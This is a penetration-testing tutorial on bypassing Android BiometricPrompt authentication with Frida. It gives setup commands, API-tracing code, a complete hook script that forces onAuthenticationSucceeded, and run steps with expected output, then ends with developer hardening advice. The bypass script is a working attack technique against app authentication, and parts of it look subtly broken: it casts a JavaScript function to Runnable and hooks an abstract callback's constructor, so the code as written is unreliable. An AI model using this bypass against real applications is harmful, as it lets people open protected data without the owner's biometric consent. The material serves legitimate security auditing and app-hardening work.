Introduction to Android Biometric Security

Android’s biometric authentication framework provides a secure and convenient way for users to access their devices and applications using unique biological traits like fingerprints or facial recognition. From a security perspective, implementing biometrics correctly is paramount to prevent unauthorized access. Developers must understand the nuances of the API, while security auditors need robust tools to identify and exploit potential weaknesses in an app’s biometric integration.

Historically, Android introduced the FingerprintManager API, which was superseded by the more unified and secure BiometricPrompt in Android 9 (API level 28). BiometricPrompt offers a more consistent user experience across different biometric types and integrates better with the secure hardware components (StrongBox Keymaster) available on modern devices.

The Evolution: FingerprintManager vs. BiometricPrompt

• FingerprintManager (API < 28): Primarily focused on fingerprint authentication. It required handling UI and error states manually, leading to inconsistencies across applications. It also had limited support for secure hardware integration directly.
• BiometricPrompt (API >= 28): A unified API for all biometric types (fingerprint, face, iris, etc.). It provides a system-managed UI, enhancing security by ensuring the user interacts with a trusted system dialog. It also facilitates integration with Hardware-backed Keystore and StrongBox Keymaster for enhanced key protection.

Despite these advancements, implementation flaws can still create vulnerabilities. Common issues include insufficient checks beyond biometric success (e.g., lack of strong server-side authentication), allowing fallback to less secure methods, or improper handling of authentication callbacks.

Setting Up Your Environment for Frida

Frida is a dynamic instrumentation toolkit that lets you inject JavaScript snippets into native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX. It’s an indispensable tool for security researchers and penetration testers.

Prerequisites:

• A rooted Android device or an emulator (e.g., Android Studio AVD with Google APIs).
• adb (Android Debug Bridge) installed and configured on your host machine.
• Python 3 and pip for installing Frida tools.

Installation Steps:

1. Install Frida-tools on your host machine:

   pip install frida-tools

2. Download Frida server for your Android device:

   Visit the Frida releases page and download the frida-server binary matching your device’s architecture (e.g., arm64 for most modern devices). You can check your device’s architecture using adb shell getprop ro.product.cpu.abi.

3. Push Frida server to your Android device and run it:

   adb push /path/to/frida-server /data/local/tmp/frida-server
   adb shell "chmod 755 /data/local/tmp/frida-server"
   adb shell "/data/local/tmp/frida-server &"

4. Verify Frida setup:

   On your host, run frida-ps -U. You should see a list of processes running on your Android device.

   frida-ps -U

Identifying Biometric API Usage

Before bypassing, you need to know which biometric APIs an app is using and how it’s integrated. This involves a combination of static and dynamic analysis.

Static Analysis:

Decompile the APK using tools like Jadx-GUI. Search for keywords related to biometric authentication:

• BiometricPrompt
• authenticate (especially when combined with BiometricPrompt or FingerprintManager)
• AuthenticationCallback
• FingerprintManager (for older apps or older Android versions)

This gives you an initial understanding of the classes and methods involved.

Dynamic Analysis with Frida:

Frida can confirm API usage at runtime. You can trace specific methods or enumerate loaded classes. For example, to check if BiometricPrompt is being used:

frida -U -f com.example.targetapp -l trace_biometric.js --no-pause

Where trace_biometric.js might contain:

Java.perform(function() {    var BiometricPrompt = Java.use('android.hardware.biometrics.BiometricPrompt');    BiometricPrompt.$init.overload('android.content.Context', 'java.util.concurrent.Executor', 'android.hardware.biometrics.BiometricPrompt$AuthenticationCallback').implementation = function(context, executor, callback) {        console.log('BiometricPrompt constructor called!');        this.$init(context, executor, callback);    };});

Hooking Android Biometric APIs with Frida

The core of bypassing biometric authentication with Frida involves hooking the authenticate method and manipulating its callback to simulate a successful authentication.

Targeting BiometricPrompt:

We’ll focus on BiometricPrompt as it’s the modern and recommended API. The goal is to hook its authenticate method and immediately invoke the onAuthenticationSucceeded callback.

Java.perform(function() {    console.log("[+] Starting Frida script to bypass BiometricPrompt...");    var BiometricPrompt = Java.use("android.hardware.biometrics.BiometricPrompt");    var AuthenticationCallback = Java.use("android.hardware.biometrics.BiometricPrompt$AuthenticationCallback");    // Hook the authenticate method    BiometricPrompt.authenticate.overload(        'android.hardware.biometrics.BiometricPrompt$CryptoObject',        'android.os.CancellationSignal',        'java.util.concurrent.Executor',        'android.hardware.biometrics.BiometricPrompt$AuthenticationCallback'    ).implementation = function(cryptoObject, cancellationSignal, executor, callback) {        console.log("[+] BiometricPrompt.authenticate called!");        // Call the original method to ensure the system proceeds as expected        // in case the app has checks before/after the biometric prompt        this.authenticate(cryptoObject, cancellationSignal, executor, callback);        // Simulate success immediately by invoking the callback        executor.execute(Java.cast(function() {            console.log("[+] Invoking onAuthenticationSucceeded callback...");            // The argument to onAuthenticationSucceeded is BiometricPrompt.AuthenticationResult            // We can pass null or construct a dummy object if needed.            callback.onAuthenticationSucceeded(null);             console.log("[+] BiometricPrompt authentication successfully bypassed!");        }, Java.use("java.lang.Runnable").class));    };    // Optional: Hook the callback constructor to ensure our hooks are active for new instances    AuthenticationCallback.$init.implementation = function() {        this.$init();        console.log("[+] AuthenticationCallback initialized and hooked.");    };});

How the Bypass Works:

1. Frida injects the JavaScript code into the target application.
2. When the application calls BiometricPrompt.authenticate, our hooked implementation takes over.
3. We first call the original authenticate method (this.authenticate(...)) to ensure the system’s biometric flow initiates. This might be important for some apps that perform initial checks before the actual biometric prompt.
4. Immediately after (or even before, depending on the desired effect), we use the provided executor to schedule a task that directly calls the onAuthenticationSucceeded method on the app’s supplied AuthenticationCallback.
5. This tricks the application into believing that a successful biometric scan occurred, bypassing the actual hardware authentication.

Practical Demonstration: Bypassing a Sample Biometric App

Let’s assume we have a simple Android application (com.example.secureapp) that uses BiometricPrompt to protect a sensitive section.

Steps:

1. Install the target application (if not already installed) via ADB:

   adb install secureapp.apk

2. Save the Frida script from above as biometric_bypass.js.
3. Run the application and attach Frida:

   frida -U -f com.example.secureapp -l biometric_bypass.js --no-pause

   The --no-pause flag allows the app to launch immediately, and Frida will attach to it.

4. Trigger biometric authentication in the app: Navigate to the section protected by biometrics. The biometric prompt should appear briefly.
5. Observe Frida’s output: In your terminal, you should see messages like:

   [+] BiometricPrompt.authenticate called![+] Invoking onAuthenticationSucceeded callback![+] BiometricPrompt authentication successfully bypassed!

6. Verify the bypass: The application should now proceed as if a valid biometric scan was performed, granting access to the protected section without requiring actual user authentication.

Conclusion and Best Practices

This demonstration highlights how Frida can be a powerful tool for security auditing Android applications, specifically for identifying and exploiting weaknesses in biometric authentication implementations. While biometric frameworks provide robust security features, developers must ensure their usage is correct and resilient against dynamic instrumentation.

Recommendations for Developers:

• Do not solely rely on client-side biometric success: Always combine biometric authentication with a strong server-side authentication mechanism, especially for sensitive operations like financial transactions or accessing critical data.
• Validate the origin of authentication: If possible, ensure that the biometric event originated from the secure element and not from a faked callback. However, this is challenging for client-side applications alone.
• Implement tamper detection: Consider anti-tampering techniques to make it harder for tools like Frida to hook into your application’s logic (though these can often be bypassed themselves).
• Use BiometricPrompt securely: Ensure the BiometricPrompt is configured correctly, especially for cryptographic operations using CryptoObject, to bind authentication to specific key usage.

Regular security audits using tools like Frida are crucial to identify these vulnerabilities before they can be exploited in the wild, ensuring user data and application integrity remain uncompromised.